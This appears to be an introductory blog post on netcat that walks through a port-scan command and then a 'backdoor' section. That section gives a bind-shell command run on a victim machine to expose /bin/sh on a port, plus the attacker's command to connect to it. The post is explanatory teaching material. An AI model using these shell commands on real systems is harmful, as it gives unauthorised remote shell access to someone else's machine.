How many times did you come across a blog/post that calls netcat a “swiss army knife”? Netcat is probablly a swiss army knife, but on steroids. It is a must have tool in your personal toolkit. If you haven’t had your first joy ride with netcat, read on, this post is for you.
Netcat allows you to read and write data across TCP and UDP sockets. That’s it, nothing else. In the simplicity of this utility, lies its very strength. Let us look at some of the very cool stuff that netcat is capable of:
Netcat is your port scanner: Yes, it can be a worthy port scanner and you can port scan a host using the following syntax:
nc -v -w2 -z scanme.org 20-40
-v makes the output verbose (add another v to increase the verbosity)
-w specifies that netcat should wait the specified number of seconds, before it decides that the attempt was useless.
-z ensures that netcat does not send any data to the listening ports.
20-40 is the port range that netcat is going to sprawl through.
Netcat is a backdoor: OK, I don’t want to sound like guys selling you a vegitable crusher over a broadcasting shopping channel and bragging about the fact that how it can crush carrots and cabbages at the same time. But netcat is even more versatile then that. It is often used as a backdoor by crackers. Following syntax (on victim machine) will run an instance of netcat listening on port 1000:
nc -l -p 1000 -e /bin/sh
-l instructs the netcat binary to be in listen mode, waiting for inbound connections
-p specifies the port number i.e. 1000
-e specifies the program or a binary that it should run after successful connection i.e. a shell (/bin/sh)
The attacker can connect back to the victim machine, on the specified port, using another netcat instance on his machine:
nc -v victim_IP 1000
victim_IP is the IP of the machine where the netcat was previously executed with -l and -e options. Ofcourse, the attacker has to figure out a way first to upload the netcat binary onto the victim’s machine.